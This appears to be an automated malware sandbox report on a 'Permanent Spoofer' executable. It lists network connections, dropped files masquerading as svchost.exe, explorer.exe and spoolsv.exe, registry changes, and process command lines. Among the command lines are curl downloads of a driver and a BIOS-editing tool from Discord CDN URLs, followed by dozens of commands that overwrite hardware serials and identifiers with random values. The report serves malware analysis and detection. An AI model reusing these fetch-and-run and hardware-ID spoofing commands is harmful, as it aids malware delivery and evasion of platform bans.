C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
memory/3944-0-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3944-1-0x0000000077614000-0x0000000077616000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exeÂ
| MD5 | 407f16d056d7bbfc4f50042565aaf71c |
| SHA1 | 183a360c72e6fe19e367acc3a63fc64b7b987747 |
| SHA256 | fcd04587bc69ac61f1d59897fb35f248a1f97a3549df838d00321d73d65fe570 |
| SHA512 | 6829e640918a28017e44c69647f8842825b5161b710afcee315c5afdad52248925912fb0614767d4b911712a7608a1a9a68a992a6121fcba2f785c131895e271 |
C:\Windows\Resources\Themes\icsys.icn.exe
| MD5 | 5036deedb789b134425f4412a6c49502 |
| SHA1 | 31e878b0f935e24ebe78dcfabbd4a11b0462c24e |
| SHA256 | 8c8dfe4cdba22f65f47851f9f5939fb31c02f8c67b1ed3de782557de6ef5d9fd |
| SHA512 | fa2a0e379164d130490037af4159bd8713b7d1265116eecb0339f0ef1ffc529764c31836ea46cdee1eb7dce0ad078b3aa86661081d1d71ecd208d4124ad650b6 |
C:\Windows\Resources\Themes\explorer.exe
| MD5 | 9373908508adffd54797a88661870e1d |
| SHA1 | a2f8da5d435182c5d9bb5f4b0502d2314ad9e335 |
| SHA256 | 4a0afd24df106611e52543d3544c95a604dd7bb463a548431b8fa0af19f6657e |
| SHA512 | 16fc6c3fa056919b0923183040ac688b5de269bb334a17cdec0780a0d0af46e03777589a02f423a5ad669cf0e2de4c96f8ea4b251d20c1a392769b708130a543 |
memory/3528-21-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\Resources\spoolsv.exe
| MD5 | 819aacbe406e4e3a3e6e1c70d70ac96c |
| SHA1 | 15b689533073abb2382a5b294a9a67a3443dc8cb |
| SHA256 | d578392a651d845b11ec9a8978ee0e8b27c06abcf37e5676c870d9e734365923 |
| SHA512 | 57ef427ea0237c745c04711d328527898e6bbc7fd3e13f9d19ad4adffde4804a41c19d3f12ccbc3b85f469e1d60e8d7f8ebaa60f8275ff4e8ddf428cc1e7c1dc |
memory/2088-30-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\Resources\svchost.exe
| MD5 | eb872126f7d3ced07b7664e3c79c605b |
| SHA1 | fd2aee67e85d4cebaa716b902d199a93ca824f37 |
| SHA256 | 84bda5ecc65fbc6db2d51bbda7972c4d9e7db9bf7f37d3d5b6c61b3856c0203f |
| SHA512 | 3b15ff532fd3e7879cfea54e6d141569d1ea88b4338dd4510d6ef3a299a4d77207cf23ec9b3f527d3f35b4d20751b62d31418a9464db5ff5f81062ca52a9701c |
memory/3940-41-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\AMIDEWINx64.EXE
| MD5 | a1ca4bebcd03fafbe2b06a46a694e29a |
| SHA1 | ffc88125007c23ff6711147a12f9bba9c3d197ed |
| SHA256 | c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65 |
| SHA512 | 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e |
memory/3660-47-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2088-54-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3052-56-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3944-58-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3660-52-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3528-60-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3940-62-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3528-72-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3940-73-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/3528-74-0x0000000000400000-0x0000000000A16000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win7-20240729-en
Max time kernel
121s
Max time network
142s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133 | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell\open | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\URL Protocol | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell\open\command | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_CLASSES\discord-1086389167996547133\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\oh no\\Permanent Spoofer\\spoofer.exe" | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul